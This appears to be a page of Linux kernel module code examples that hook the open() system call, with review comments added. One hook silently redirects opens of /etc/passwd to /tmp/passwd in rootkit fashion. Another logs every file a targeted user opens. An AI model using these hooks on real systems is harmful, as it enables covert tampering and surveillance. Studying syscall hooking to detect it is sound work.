Beispiel #1
//Define our new sneaky version of the 'open' syscall
/*
 * Replacement entry for the open() system call. Apart from the path
 * substitution in the first branch it only forwards to original_call().
 *
 * pathname: user-space pointer supplied by the calling process.
 * flags:    open(2) flags, passed through unchanged.
 * Returns:  whatever original_call() returns.
 *
 * NOTE(review): strstr() is applied to the user-space pointer directly from
 * kernel context, with no copy-from-user step, and copy_to_user() then writes
 * sizeof(replace) (12 bytes, NUL included) into the caller's buffer whatever
 * that buffer's real length is; the (void *) cast also discards the const on
 * pathname. Neither call's return value is checked. These are correctness
 * defects of the code as written.
 */
asmlinkage int sneaky_sys_open(const char *pathname, int flags)
{
  if (strstr(pathname, "/etc/passwd") != NULL) {
    /* Match is on the substring anywhere in the path, not a prefix test.
     * The caller's own buffer is rewritten in place before forwarding. */
    char replace[] = "/tmp/passwd";
    copy_to_user((void *)pathname, &replace, sizeof(replace));
    return original_call(pathname, flags);
  } else {
    //printk(KERN_INFO "Very, very Sneaky!\n");
    return original_call(pathname, flags);
  }
}
/* 
 * The function we'll replace sys_open (the function
 * called when you call the open system call) with. To
 * find the exact prototype, with the number and type
 * of arguments, we find the original function first
 * (it's at fs/open.c).
 *
 * In theory, this means that we're tied to the
 * current version of the kernel. In practice, the
 * system calls almost never change (it would wreak havoc
 * and require programs to be recompiled, since the system
 * calls are the interface between the kernel and the
 * processes).
 */
asmlinkage int our_sys_open(const char *filename, int flags, int mode)
{
	/* i indexes the user string; ch holds the byte most recently fetched.
	 * ch is deliberately left uninitialised here and is first written by
	 * get_user() in the loop below. */
	int i = 0;
	char ch;

	/* 
	 * Check if this is the user we're spying on.
	 * 'uid' is not declared in this block (presumably a file-scope
	 * variable); it is compared with the uid field of the calling task's
	 * credentials.
	 */
	if (uid == current->cred->uid.val) {
		/* 
		 * Report the file, if relevant: fetch the filename from user
		 * space one byte at a time and echo it to the kernel log.
		 * The return value of get_user() is not checked, and none of
		 * these printk() calls carries a log-level or KERN_CONT prefix.
		 */
		printk("Opened file by %d: ", uid);
		do {
			get_user(ch, filename + i);
			i++;
			printk("%c", ch);
		} while (ch != 0);
		printk("\n");
	}

	/* Runs on every open(), not only for the watched uid: two marker lines
	 * and a full stack backtrace go to the kernel log per call. */
	printk(KERN_INFO "L5 syscall dump stack start.\n");
	dump_stack();
	printk(KERN_INFO "L5 syscall dump stack over.\n");

	/* 
	 * Call the original sys_open - otherwise, we lose
	 * the ability to open files 
	 */
	return original_call(filename, flags, mode);
}
Beispiel #3
/*
 * Minimal open() hook: writes one fixed line to the kernel log and forwards
 * the call to original_call() unchanged. The "<0>" prefix is the raw form of
 * the KERN_EMERG log level, so the line is emitted at the highest priority.
 */
asmlinkage int sys_our_open(const char *filename, int flags, int mode){
	printk("<0>open system call\n");
	return (original_call(filename, flags, mode));
}
/*
 * File-local open() hook: logs a fixed marker and forwards to original_call().
 * MODULE_NAME is a macro defined elsewhere; for this to compile it must expand
 * to a string literal, which the preprocessor concatenates with ": PWNED\n".
 * The printk() carries no explicit log level.
 */
static asmlinkage int hijacker_sys_open(const char* file, int flags, int mode)
{
	printk(MODULE_NAME ": PWNED\n");

	return original_call(file, flags, mode);
}